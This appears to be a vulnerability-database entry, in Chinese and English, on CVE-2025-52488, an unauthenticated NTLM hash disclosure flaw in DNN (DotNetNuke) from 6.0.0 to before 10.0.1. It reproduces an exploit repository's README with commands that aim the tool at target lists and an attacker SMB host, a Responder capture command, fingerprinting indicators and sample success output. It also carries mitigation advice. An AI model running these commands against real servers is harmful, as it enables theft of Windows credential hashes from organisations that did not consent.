DNN Unicode Path Normalization NTLM Hash Disclosure Vulnerability

漏洞信息

漏洞名称： DNN Unicode Path Normalization NTLM Hash Disclosure Vulnerability

漏洞编号：

• CVE： CVE-2025-52488

漏洞类型： 信息泄露

漏洞等级： 高危

漏洞描述： 该漏洞影响DNN（原DotNetNuke）平台，版本从6.0.0到10.0.1之前的版本。DNN是一个广泛使用的开源内容管理系统（CMS），主要用于构建企业级网站和网络应用程序。由于其灵活性和可扩展性，DNN在全球范围内被许多组织采用。

漏洞的技术根源在于Windows/.NET的特性和Unicode路径规范化的不当处理，攻击者可以利用这一点迫使目标DNN服务器向攻击者控制的SMB服务器发起请求，从而在认证过程中泄露NTLM哈希。这种攻击不需要认证，攻击者可以通过网络远程利用此漏洞。

此漏洞的安全风险较高，因为它可能导致敏感信息（如NTLM哈希）的泄露，进而可能被用于进一步的攻击，如横向移动或权限提升。由于攻击不需要认证且可以自动化执行，因此增加了其潜在危害。建议受影响用户立即更新到DNN 10.0.1或更高版本，并实施网络级控制以防止向外部服务器发起SMB请求。

产品厂商： DNN (formerly DotNetNuke)

产品名称： DNN (DotNetNuke)

影响版本： 6.0.0 to before 10.0.1

来源： https://github.com/SystemVll/CVE-2025-52488

类型： CVE-2025:github search

仓库文件

• .python-version
• README.md
• main.py
• pyproject.toml
• requirements.txt
• uv.lock

来源概述

DNN Unicode Path Normalization NTLM Hash Disclosure Exploit (CVE-2025-52488)

Overview

This exploit targets a vulnerability in DNN (formerly DotNetNuke) versions 6.0.0 to before 10.0.1 that allows attackers to disclose NTLM hashes through Unicode path normalization attacks.

Vulnerability Details

• CVE ID: CVE-2025-52488
• Severity: High (CVSS 8.6)
• Affected Versions: 6.0.0 to before 10.0.1
• Attack Vector: Network
• Authentication: Not required

How it Works

The exploit abuses Windows/.NET quirks and Unicode normalization to force the target DNN server to make SMB requests to an attacker-controlled server, potentially exposing NTLM hashes during the authentication process.

Prerequisites

1. Python 3.7+
2. Required packages (install with pip install -r requirements.txt)
3. SMB server to capture NTLM hashes (e.g., Responder, Burp Collaborator)

Usage

Basic Usage

python main.py targets.txt attacker.example.com

With Custom Parameters

python main.py targets.txt 192.168.1.100 -t 20 --timeout 15

Arguments

• targets: File containing list of DNN hosts (one per line)
• smb_server: SMB server hostname/IP to capture NTLM hashes
• -t, --threads: Number of concurrent threads (default: 10)
• --timeout: Request timeout in seconds (default: 10)

Target File Format

Create a text file with target URLs, one per line:

http://target1.example.com
https://target2.example.com:8080
target3.example.com

Setting Up SMB Server

You can use tools like Responder to capture NTLM hashes:

responder -I eth0 -wrf

Or use Burp Collaborator for out-of-band detection.

Example Output

[2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets
[2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts

Detection Indicators

The exploit looks for the following DNN indicators:

• dnn_IsMobile cookie
• dotnetnuke in response
• dnnconnect in response
• DNN Platform in response

Mitigation

• Update DNN to version 10.0.1 or later
• Implement network-level controls to prevent SMB requests to external servers
• Monitor for suspicious file upload attempts

Disclaimer

This tool is for educational and authorized security testing purposes only. Use responsibly and only on systems you own or have explicit permission to test.

References

• CVE-2025-52488
• Assetnote Research